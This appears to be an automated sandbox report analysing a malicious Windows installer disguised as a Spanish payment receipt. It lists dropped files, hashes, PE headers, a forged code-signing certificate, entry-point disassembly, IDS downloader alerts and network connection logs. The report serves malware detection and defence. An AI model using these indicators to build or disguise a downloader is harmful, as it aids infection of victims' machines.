                                                                                                                                                                                  MD5:3C8436F0E7B9D6C8D25947E4374D179E
                                                                                                                                                                                  SHA1:1BE9130C45876D27F39C2097771090E573697B72
                                                                                                                                                                                  SHA-256:8512544EB0068094F92CD705FD941A0F07F5697D690AA62EA351B1363F348C75
                                                                                                                                                                                  SHA-512:AA229B1E5C66A78D67A06B601E5AAD9B000B4E15BD0A5F15FF001201F228FC9950418CF9B2F205FCA07BE73E70A06383766DA3804341C42C5597BCBEDCC651FD
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:.t...................jj.H..........................................@....................2..````...99............$.........hhhh..*.....r................dddd.......;;...............................`........................'...^^......;.....(.;.oo..................$$$...........+++.\.<.......................5.........WWW...........................#.........66666....uuu.............................................BBBB............:....4.....E......222...,....6...._..............................I............NN...R.................s...................3............1............................ff.ff..Y.....UU..zzz.................ii.....N..........D............6.............}}..!.....................__.......J.......$...........77..........LL........dd.......OO...a..xxx.....]...UU..8....i.._..........................=............U.y......l...VVV.......))).......ZZZZZ.........u........;;...........h............................GG.xx.......jj...............SSSSS....................bb..............
                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1106880
                                                                                                                                                                                  Entropy (8bit):7.972434784115188
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24576:3NrNYoKOHCWJSICvcVU2F3VwV5k7j5awX300zQUGtZQ:d+jEWhvsU2F3VwXgj5aEkHUGtZQ
                                                                                                                                                                                  MD5:4252CD5753DEF4A484FB3313E1029E66
                                                                                                                                                                                  SHA1:19FD0734102E1EEBE6C7F42D530D30E920366E00
                                                                                                                                                                                  SHA-256:96B8248BE606C47B8955A560F3DF160A4C9026CE1956E407DAF177F17549E4F7
                                                                                                                                                                                  SHA-512:471851F39C4D058798BCE13F80C63F38E3F3196132C5FE3068982362D7C9C876670CEF2F768A8DE7ED300669A85C58B367C1B51221617A1D8AE67CDA77B82984
                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf.sV..Pf..V`..Pf.Rich.Pf.........................PE..L....Oa.................f...*.......4............@.......................................@..........................................@...Y.............. ............................................................................................text....e.......f.................. ..`.rdata...............j..............@..@.data...8............~..............@....ndata...................................rsrc....Y...@...Z..................@..@................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):26
                                                                                                                                                                                  Entropy (8bit):3.95006375643621
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                  Process:C:\Users\user\Desktop\Justificante pago-09453256434687.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):5657071
                                                                                                                                                                                  Entropy (8bit):0.15928467329934035
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:768:hia6UGQo5IgoTcs1teRMojkuNW52cfotYssiEfN5RJhDjTeYJNKUGQ0yyiJ+yDKJ:RLLXHTFL
                                                                                                                                                                                  MD5:7FD6A7B5493B8D6659842CBDAC26F759
                                                                                                                                                                                  SHA1:59ECA4FEF3F72F17B4F87C647836AF1EE0B7B208
                                                                                                                                                                                  SHA-256:F38655E8753CF872BBC92F703C0A23F3CB35EFEA183296B92ADF3672A509162C
                                                                                                                                                                                  SHA-512:C300E5599EB51D0862F806DF1C6274B0D59F75E41132F85C9E47F777CDD7B2E9B67C06BC033CD1FFE1C87A7EDD6B07D3E9DAD2D280EBAB1E22C7CA6291E881F5
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:............................................n..............S.......................................................................................................................................................................q...............................................................................................................................................................................................................................................................................................................................................................................................z.............................................................................................................................................................................................................................4..q...................................................................................................................................................................
                                                                                                                                                                                  Process:C:\Users\user\Desktop\Justificante pago-09453256434687.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):108656
                                                                                                                                                                                  Entropy (8bit):0.1629399370348107
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:48:iM4xHhYyQjrwzEa24+rFK3q01Z2FdZe/Gbjd6Ne7GJ:duhYyQjcd++7KFdZKGAw
                                                                                                                                                                                  MD5:ABD3958B383B1C9F43AC4E47DD12BEC4
                                                                                                                                                                                  SHA1:4248CEAF77E8A46BBFA08FC14BDAB5428D7194F6
                                                                                                                                                                                  SHA-256:30E7E92C51752F6CFD747EC30BF29792A819FDA586557B053FF141861BC3EA7B
                                                                                                                                                                                  SHA-512:F6FE0761F4E15D9FCCCE230FCDFC77E95A259A014654FF94A600CBA120F222ED2085B6DC3CFEC7F21177137BD5136AC42894E113EAFD1D21659FF3F14316799B
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:............................................................................................................................................................................................................._....................................................................................................................................................................................................................................................................................................................................................................................)...........................................................<.......................................................................i.........................................................................................................................................................................................).......................................................................................................
                                                                                                                                                                                  Process:C:\Users\user\Desktop\Justificante pago-09453256434687.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):6429709
                                                                                                                                                                                  Entropy (8bit):0.15806775405645646
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:768:VNOwnrRrLv7/6Ngd/3fk7lv70zCxVdw2J+bxTylmmf13Y2jmVnc+1dHiqkGAr/EA:vGD8vB
                                                                                                                                                                                  MD5:F4FF9F83B617854EAA4804F4499C7538
                                                                                                                                                                                  SHA1:C93182B840EBDDB4A16EF90F1B0AE26DC1562FBA
                                                                                                                                                                                  SHA-256:AFA03D58592E5BE1ADF5E352A40CE899BC707BB40CC6CD1EF5930E6302A94C18
                                                                                                                                                                                  SHA-512:2E5C29BD767EEA4939A4B82CD7DD6EC323255D9046D96CE2C1931D617D125AB96ABC1F4B5444097A3A8085356FB7BD894A5C9769710B67823228BD1C371CF756
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:...............................................................................................................................................................................................................................................................................................................r.........................................................................................................................................................Q.....................................................................................................................................................................................................................................................................................................................................................................................................................Y........................................................................................................................................

Process:C:\Users\user\Desktop\Justificante pago-09453256434687.exe
File Type:data
Category:dropped
Size (bytes):7637195
Entropy (8bit):0.1584950093042192
Encrypted:false
SSDEEP:768:DASGeKc+zkfELL9UhjwNNoVJ2zV7S9OrvkoAaqV6zoPv2WHiirTgQKUIZsrj6ZzL:gXK+k
MD5:EB71C6BE6D08F8A7C7C9DA1335DF04C1
SHA1:7B57A40E3F6C44178A25EF465C3E7F5EA3184335
SHA-256:D1D5BFF683EDC3A076382FCFE8C8A28EA1FF6A1C7731A80BAB8FFF0E82A54D07
SHA-512:5ED43E9E6A66F981DEEC765A13A361BCCEFE4E1A38C6847F9DB00F2ED1BF50497E36B6D5398190FB2CB0B191E4DA33A77C7378CDB446169941C84776D7406A48
Malicious:false

Process:C:\Users\user\Desktop\Justificante pago-09453256434687.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):465
Entropy (8bit):4.255544231677184
Encrypted:false
SSDEEP:12:ZR1EOIygKJPTYEO/OAOLkKARrQdNJdKiXkB9MOyFCZ60WgE:9xIyPtYEO/vlK6QUlE
MD5:2F8A39C6A08A57605F1965012760D560
SHA1:4607DE528A646C0758D7FB322CF9CCFFAFA026B8
SHA-256:37909462973046DA9CD15B9FB1CCD7F92D97C26AF08C83A8D486BA411DC69373
SHA-512:0B2F239E494FCEE5D18812D98E3571F20B049CAF11CEA675CB55E95283A6E99E7A854DD87087EC5F7C402B7A7C760A1AB4B399EA17319C1F9249465E542E2D8D
Malicious:false
Preview:pachydermateous bomuldsskjorterne redisseisin minimalists.delikatessehandlens standardfilnavn spillerelater,udstafferingers parallelforskydning ynglepladsernes libanons somatotypically inveigler sammenrendets..tyrannierne coeternally kommandrs colliquative gonidic ringetonen issens hyperanabolic unpicturesque..sminker apporterende campaigner gorvarehandlen radiosender bibelskes.logikfamilier neurotransmission pasfotoerne searchment inrighted couphgens toadfish,

Process:C:\Users\user\Desktop\Justificante pago-09453256434687.exe
File Type:data
Category:dropped
Size (bytes):2537825
Entropy (8bit):0.15731061171505112
Encrypted:false
SSDEEP:768:ZfmQIC91KjqGcnL63MV1HZDQDVlybvFG7dH9Sf12lqM1FBQWEP3dNaRrwPu1Br0O:Rrc
MD5:6462B1502F14E3329E79F164F0B8EDA9
SHA1:70F60B7634B75DAFA601D70E812D7127F4432AD3
SHA-256:50852368EB9E21692315077EB7DD5E833B4430342695CFF4E70FEF7DF59DCFB7
SHA-512:979F463C29EFDE5C746CE6A34B72DC064BDB9364702C5DB24B567E823B6992E076BDB160979330EDDDA03F9AE4EEB20FD1E656337A2654E43B3B36673820CF45
Malicious:false

Process:C:\Users\user\Desktop\Justificante pago-09453256434687.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):7168
Entropy (8bit):5.298362543684714
Encrypted:false
SSDEEP:96:J9zdzBzMDByZtr/HDQIUIq9m6v6vBckzu9wSBpLEgvElHlernNQaSGYuH2DQ:JykDr/HA5v6G2IElFernNQZGdHW
MD5:675C4948E1EFC929EDCABFE67148EDDD
SHA1:F5BDD2C4329ED2732ECFE3423C3CC482606EB28E
SHA-256:1076CA39C449ED1A968021B76EF31F22A5692DFAFEEA29460E8D970A63C59906
SHA-512:61737021F86F54279D0A4E35DB0D0808E9A55D89784A31D597F2E4B65B7BBEEC99AA6C79D65258259130EEDA2E5B2820F4F1247777A3010F2DC53E30C612A683
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:
• Filename: pedido-035241.exe, Detection: malicious
• Filename: uu8v4UUzTU.exe, Detection: malicious
• Filename: uu8v4UUzTU.exe, Detection: malicious
• Filename: , Detection: malicious
• Filename: , Detection: malicious
• Filename: SecuriteInfo.com.W32.PossibleThreat.20282.14864.exe, Detection: malicious
• Filename: SecuriteInfo.com.W32.PossibleThreat.20282.14864.exe, Detection: malicious
• Filename: GrammarlyInstaller.evxSw76fmxki94ued2mj0c82.exe, Detection: malicious
• Filename: GrammarlyInstaller.evxSw76fmxki94ued2mj0c82.exe, Detection: malicious
• Filename: , Detection: malicious

File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):7.972434784115188
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:Justificante pago-09453256434687.exe
File size:1'106'880 bytes
MD5:4252cd5753def4a484fb3313e1029e66
SHA1:19fd0734102e1eebe6c7f42d530d30e920366e00
SHA256:96b8248be606c47b8955a560f3df160a4c9026ce1956e407daf177f17549e4f7
SHA512:471851f39c4d058798bce13f80c63f38e3f3196132c5fe3068982362d7c9c876670cef2f768a8de7ed300669a85c58b367c1b51221617a1d8ae67cda77b82984
SSDEEP:24576:3NrNYoKOHCWJSICvcVU2F3VwV5k7j5awX300zQUGtZQ:d+jEWhvsU2F3VwXgj5aEkHUGtZQ
TLSH:B535230561D5E467E0E14B36F63A18F213AA2D21C8718A2F53257F78BFB12A63D3D325
File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L.....Oa.................f...*.....
Icon Hash:4e33695d030a3f39
Entrypoint:0x4034f7
Entrypoint Section:.text
Digitally signed:true
Imagebase:0x400000
Subsystem:windows gui
Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:0x614F9AE5 [Sat Sep 25 21:55:49 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:4
OS Version Minor:0
File Version Major:4
File Version Minor:0
Subsystem Version Major:4
Subsystem Version Minor:0
Import Hash:56a78d55f3f7af51443e58e0ce2fb5f6
Signature Valid:false
Signature Issuer:CN=Tehran, E=Admissory@Nonclinging.Am, O=Tehran, L=Glan Honddu, OU="Tilbyg Cayuses Ethnolinguistic ", S=Wales, C=GB
Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
Error Number:-2146762487
Not Before, Not After
• 02/11/2024 06:34:33 02/11/2025 06:34:33
Subject Chain
• CN=Tehran, E=Admissory@Nonclinging.Am, O=Tehran, L=Glan Honddu, OU="Tilbyg Cayuses Ethnolinguistic ", S=Wales, C=GB
Version:3
Thumbprint MD5:7125B26AD47B1EF2F57A1D334C3ED3CA
Thumbprint SHA-1:B9A39AEB4CB807EE90F2CE94E1298C47D6ED6196
Thumbprint SHA-256:4451356EAE3D4C11E252079D3D3D664D603B200B87E984A189B1629EE40EB0AF
Serial:2DEB645BD81ED6623A453CE607AA7C569CE12379

Instruction
push ebp
mov ebp, esp
sub esp, 000003F4h
push ebx
push esi
push edi
push 00000020h
pop edi
xor ebx, ebx
push 00008001h
mov dword ptr [ebp-14h], ebx
mov dword ptr [ebp-04h], 0040A2E0h
mov dword ptr [ebp-10h], ebx
call dword ptr [004080CCh]
mov esi, dword ptr [004080D0h]
lea eax, dword ptr [ebp-00000140h]
push eax
mov dword ptr [ebp-0000012Ch], ebx
mov dword ptr [ebp-2Ch], ebx
mov dword ptr [ebp-28h], ebx
mov dword ptr [ebp-00000140h], 0000011Ch
call esi
test eax, eax
jne 00007F680C864DAAh
lea eax, dword ptr [ebp-00000140h]
                                                                                                                                                                                  mov dword ptr [ebp-00000140h], 00000114h
                                                                                                                                                                                  push eax
                                                                                                                                                                                  call esi
                                                                                                                                                                                  mov ax, word ptr [ebp-0000012Ch]
                                                                                                                                                                                  mov ecx, dword ptr [ebp-00000112h]
                                                                                                                                                                                  sub ax, 00000053h
                                                                                                                                                                                  add ecx, FFFFFFD0h
                                                                                                                                                                                  neg ax
                                                                                                                                                                                  sbb eax, eax
                                                                                                                                                                                  mov byte ptr [ebp-26h], 00000004h
                                                                                                                                                                                  not eax
                                                                                                                                                                                  and eax, ecx
                                                                                                                                                                                  mov word ptr [ebp-2Ch], ax
                                                                                                                                                                                  cmp dword ptr [ebp-0000013Ch], 0Ah
                                                                                                                                                                                  jnc 00007F680C864D7Ah
                                                                                                                                                                                  and word ptr [ebp-00000132h], 0000h
                                                                                                                                                                                  mov eax, dword ptr [ebp-00000134h]
                                                                                                                                                                                  movzx ecx, byte ptr [ebp-00000138h]
                                                                                                                                                                                  mov dword ptr [0042A2D8h], eax
                                                                                                                                                                                  xor eax, eax
                                                                                                                                                                                  mov ah, byte ptr [ebp-0000013Ch]
                                                                                                                                                                                  movzx eax, ax
                                                                                                                                                                                  or eax, ecx
                                                                                                                                                                                  xor ecx, ecx
                                                                                                                                                                                  mov ch, byte ptr [ebp-2Ch]
                                                                                                                                                                                  movzx ecx, cx
                                                                                                                                                                                  shl eax, 10h
                                                                                                                                                                                  or eax, ecx
                                                                                                                                                                                  Programming Language:
                                                                                                                                                                                  • [EXP] VC++ 6.0 SP5 build 8804
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8504 | 0xa0 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x54000 | 0x159b8 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x10dca0 | 0x720 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x2b0 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x6515 | 0x6600 | 26e66bea3b62728a217ae7bf343ebc1a | False | 0.6615349264705882 | data | 6.439707948554623 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x8000 | 0x139a | 0x1400 | 691f0273dad50ec603f6fedf850b58ee | False | 0.45 | data | 5.145774564074664 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xa000 | 0x20338 | 0x600 | 4b75405561a3fcc45b8fe27a6808f3b5 | False | 0.4993489583333333 | data | 4.013698650446401 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata | 0x2b000 | 0x29000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x54000 | 0x159b8 | 0x15a00 | 99e35a8b4499e294dd3cd1daedb48858 | False | 0.8200754154624278 | data | 7.353353976387772 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x54418 | 0x9e8c | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.9934217009953681
RT_ICON | 0x5e2a8 | 0x3344 | PNG image data, 256 x 256, 8-bit colormap, non-interlaced | English | United States | 0.9758457787259982
RT_ICON | 0x615f0 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.41275933609958504
RT_ICON | 0x63b98 | 0x1743 | PNG image data, 256 x 256, 4-bit colormap, non-interlaced | English | United States | 0.9952980688497062
RT_ICON | 0x652e0 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.4580206378986867
RT_ICON | 0x66388 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304 | English | United States | 0.5692963752665245
RT_ICON | 0x67230 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024 | English | United States | 0.6601985559566786
RT_ICON | 0x67ad8 | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 1152 | English | United States | 0.5
RT_ICON | 0x68140 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256 | English | United States | 0.5238439306358381
RT_ICON | 0x686a8 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.6063829787234043
RT_ICON | 0x68b10 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512 | English | United States | 0.6747311827956989
RT_ICON | 0x68df8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128 | English | United States | 0.8074324324324325
RT_DIALOG | 0x68f20 | 0x100 | data | English | United States | 0.5234375
RT_DIALOG | 0x69020 | 0x11c | data | English | United States | 0.6056338028169014
RT_DIALOG | 0x69140 | 0xc4 | data | English | United States | 0.5918367346938775
RT_DIALOG | 0x69208 | 0x60 | data | English | United States | 0.7291666666666666
RT_GROUP_ICON | 0x69268 | 0xae | data | English | United States | 0.632183908045977
RT_VERSION | 0x69318 | 0x274 | data | English | United States | 0.47611464968152867
RT_MANIFEST | 0x69590 | 0x423 | XML 1.0 document, ASCII text, with very long lines (1059), with no line terminators | English | United States | 0.5127478753541076
DLL | Import
ADVAPI32.dll | RegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
SHELL32.dll | SHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
ole32.dll | OleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
COMCTL32.dll | ImageList_Create, ImageList_Destroy, ImageList_AddMasked
USER32.dll | GetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
GDI32.dll | SetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
KERNEL32.dll | GetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, CreateFileW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW
Language of compilation system | Country where language is spoken
English | United States
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-16T18:28:44.726551+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.4 | 49736 | 172.217.19.174 | 443 | TCP
2024-12-16T18:28:52.347535+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49738 | 158.101.44.242 | 80 | TCP
2024-12-16T18:28:55.285176+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49738 | 158.101.44.242 | 80 | TCP
2024-12-16T18:28:56.968822+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.4 | 49740 | 104.21.67.152 | 443 | TCP
2024-12-16T18:28:58.363210+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49742 | 158.101.44.242 | 80 | TCP
2024-12-16T18:29:13.174013+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.4 | 49781 | 104.21.67.152 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 16, 2024 18:28:42.098860979 CET | 49736 | 443 | 192.168.2.4 | 172.217.19.174
Dec 16, 2024 18:28:42.098908901 CET | 443 | 49736 | 172.217.19.174 | 192.168.2.4
Dec 16, 2024 18:28:42.099065065 CET | 49736 | 443 | 192.168.2.4 | 172.217.19.174
Dec 16, 2024 18:28:42.109729052 CET | 49736 | 443 | 192.168.2.4 | 172.217.19.174
Dec 16, 2024 18:28:42.109744072 CET | 443 | 49736 | 172.217.19.174 | 192.168.2.4
Dec 16, 2024 18:28:43.807100058 CET | 443 | 49736 | 172.217.19.174 | 192.168.2.4
Dec 16, 2024 18:28:43.807225943 CET | 49736 | 443 | 192.168.2.4 | 172.217.19.174
Dec 16, 2024 18:28:43.807866096 CET | 443 | 49736 | 172.217.19.174 | 192.168.2.4
Dec 16, 2024 18:28:43.807929993 CET | 49736 | 443 | 192.168.2.4 | 172.217.19.174
Dec 16, 2024 18:28:43.853358030 CET | 49736 | 443 | 192.168.2.4 | 172.217.19.174
Dec 16, 2024 18:28:43.853374004 CET | 443 | 49736 | 172.217.19.174 | 192.168.2.4
Dec 16, 2024 18:28:43.853594065 CET | 443 | 49736 | 172.217.19.174 | 192.168.2.4
Dec 16, 2024 18:28:43.853647947 CET | 49736 | 443 | 192.168.2.4 | 172.217.19.174
Dec 16, 2024 18:28:43.857065916 CET | 49736 | 443 | 192.168.2.4 | 172.217.19.174
Dec 16, 2024 18:28:43.903320074 CET | 443 | 49736 | 172.217.19.174 | 192.168.2.4
Dec 16, 2024 18:28:44.726521015 CET | 443 | 49736 | 172.217.19.174 | 192.168.2.4
Dec 16, 2024 18:28:44.726602077 CET | 49736 | 443 | 192.168.2.4 | 172.217.19.174
Dec 16, 2024 18:28:44.726617098 CET | 443 | 49736 | 172.217.19.174 | 192.168.2.4
Dec 16, 2024 18:28:44.726664066 CET | 49736 | 443 | 192.168.2.4 | 172.217.19.174
Dec 16, 2024 18:28:44.726811886 CET | 49736 | 443 | 192.168.2.4 | 172.217.19.174
Dec 16, 2024 18:28:44.726835966 CET | 443 | 49736 | 172.217.19.174 | 192.168.2.4
Dec 16, 2024 18:28:44.726885080 CET | 49736 | 443 | 192.168.2.4 | 172.217.19.174
Dec 16, 2024 18:28:44.879934072 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1
Dec 16, 2024 18:28:44.880033016 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4
Dec 16, 2024 18:28:44.880166054 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1
Dec 16, 2024 18:28:44.880470037 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1
Dec 16, 2024 18:28:44.880500078 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4
Dec 16, 2024 18:28:46.578030109 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4
Dec 16, 2024 18:28:46.578165054 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1
Dec 16, 2024 18:28:46.582654953 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1
Dec 16, 2024 18:28:46.582684040 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4
Dec 16, 2024 18:28:46.582962036 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4
Dec 16, 2024 18:28:46.583034039 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1
Dec 16, 2024 18:28:46.583388090 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:46.631336927 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:49.392467022 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:49.392709970 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:49.405150890 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:49.405373096 CET49737443192.168.2.4142.250.181.1
